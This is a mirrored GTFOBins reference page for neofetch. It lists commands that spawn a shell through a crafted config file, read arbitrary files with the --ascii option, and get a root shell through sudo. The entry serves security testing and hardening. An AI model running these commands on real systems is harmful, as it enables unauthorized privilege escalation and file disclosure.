This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-29 03:31:42 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
neofetch.md
ymka-shelter
720cc73c7e
Add neofetch shell
...
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-05-09 14:41:13 +02:00
496 B
Raw
Blame
History
functions
shell
file-read
sudo
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF neofetch --config $TF
description
code
The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
LFILE=file_to_read neofetch --ascii $LFILE
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF sudo neofetch --config $TF